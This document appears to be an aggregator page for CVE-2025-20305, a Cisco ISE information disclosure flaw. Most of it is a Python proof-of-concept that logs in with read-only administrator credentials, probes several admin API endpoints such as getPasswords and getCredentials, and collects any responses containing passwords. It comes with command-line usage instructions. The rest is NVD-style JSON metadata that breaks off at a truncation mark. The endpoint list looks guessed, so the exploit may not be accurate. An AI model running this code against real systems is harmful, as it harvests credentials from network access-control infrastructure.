CVE-2025-20305

import requests import json import sys from urllib.parse import urljoin # CVE-2025-20305 PoC - Cisco ISE Information Disclosure # This PoC demonstrates exploiting the information disclosure vulnerability # that allows read-only administrators to view passwords normally hidden # from low-privilege users. class CiscoISEPoC: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.session.verify = False # Disable SSL verification for testing self.token = None def authenticate(self): """Authenticate with Cisco ISE using read-only admin credentials""" login_url = f"{self.target_url}/admin/login.jsp" auth_data = { 'username': self.username, 'password': self.password } try: response = self.session.post(login_url, data=auth_data, timeout=30) if response.status_code == 200 and 'Admin' in response.text: print(f"[+] Successfully authenticated as {self.username}") return True print("[-] Authentication failed") return False except requests.RequestException as e: print(f"[-] Connection error: {e}") return False def exploit_information_disclosure(self): """Exploit the vulnerability to obtain sensitive information""" # Target endpoints that may expose sensitive data to low-privilege users targets = [ '/admin/API/mnt/AdminUser/list', '/admin/API/systemConfig/getPasswords', '/admin/API/AdminUser/getAllUsers', '/admin/API/identity/getCredentials' ] results = [] for endpoint in targets: try: url = urljoin(self.target_url, endpoint) response = self.session.get(url, timeout=30) if response.status_code == 200: # Check if response contains sensitive information if 'password' in response.text.lower() or 'credential' in response.text.lower(): print(f"[+] Sensitive data found at {endpoint}") results.append({ 'endpoint': endpoint, 'data': response.text, 'status': 'VULNERABLE' }) except requests.RequestException: continue return results def run(self): """Execute the PoC exploitation""" print(f"[*] Targeting: {self.target_url}") print(f"[*] Using credentials: {self.username}/{self.password}") if not self.authenticate(): return None print("[*] Attempting to exploit information disclosure...") results = self.exploit_information_disclosure() if results: print(f"\n[!] Found {len(results)} vulnerable endpoints") return results else: print("[-] No vulnerable endpoints found or already patched") return None if __name__ == '__main__': if len(sys.argv) < 4: print("Usage: python cve_2025_20305_poc.py <target_url> <username> <password>") print("Example: python cve_2025_20305_poc.py https://ise.example.com admin readonlypass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] password = sys.argv[3] poc = CiscoISEPoC(target, user, password) poc.run()

{"cve": {"id": "CVE-2025-20305", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:37.170", "lastModified": "2025-11-19T15:02:15.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to obtain sensitive information from an affected device.\r\n\r This vulnerability exists because certain files lack proper data protection mechanisms. An attacker with read-only Administrator privileges could exploit this vulnerability by performing actions where the results should only be viewable to a high-privileged user. A successful exploit could allow the attacker to view passwords that are normally not visible to read-only administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1.0", "matchCriteriaId": "A219182D-3C7A-4DFE-B716-3F77705C3D00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "7932D5D5-83E1-4BEF-845A-D0783D4BB750"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch1:*:*:*:*:*:*", "matchCriteriaId": "1B818846-4A6E-4256-B344-281E8C786C43"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "A44858A2-922A-425A-8B38-0C47DB911A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch3:*:*:*:*:*:*", "matchCriteriaId": "53484A32-757B-42F8-B655-554C34222060"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch4:*:*:*:*:*:*", "matchCriteriaId": "0CCAC61F-C273-49B3-A631-31D3AE3EB148"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch5:*:*:*:*:*:*", "matchCriteriaId": "51AEFCE6-FB4A-4B1C-A23D-83CC3CF3FBBD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch6:*:*:*:*:*:*", "matchCriteriaId": "B452B4F0-8510-475E-9AE8-B48FABB4D7D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch7:*:*:*:*:*:*", "matchCriteriaId": "5733512D-12B5-4098-AF90-9D68217FAC27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "F1B9C2C1-59A4-49A0-9B74-83CCB063E55D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch1:*:*:*:*:*:*", "matchCriteriaId": "DFD29A0B-0D75-4EAB-BCE0-79450EC75DD0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "E6C94CC4-CC08-4DAF-A606-FDAFC92720A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch3:*:*:*:*:*:*", "matchCriteriaId": "BB069EA3-7B8C-42B5-8035-2EE5ED3F56E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch4:*:*:*:*:*:*", "matchCriteriaId": "FF8B81A6-BF44-4E5F-B167-39F61DDCA026"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch5:*:*:*:*:*:*", "matchCriteriaId": "56E0F0EC-3E66-4866-89F5-89B331F3F517"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch6:*:*:*:*:*:*", "matchCriteriaId": "2E3E8937-2859-4A2A-91C0-05F674EF0466"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch7:*:*:*:*:*:*", "matchCriteriaId": "D4B14684-EB9E-405B-85FA-B62E57CB292C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "D23905E0-E525-49B1-8E5F-4EB42D186768"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch1:*:*:*:*:*:*", "matchCriteriaId" ... (truncated)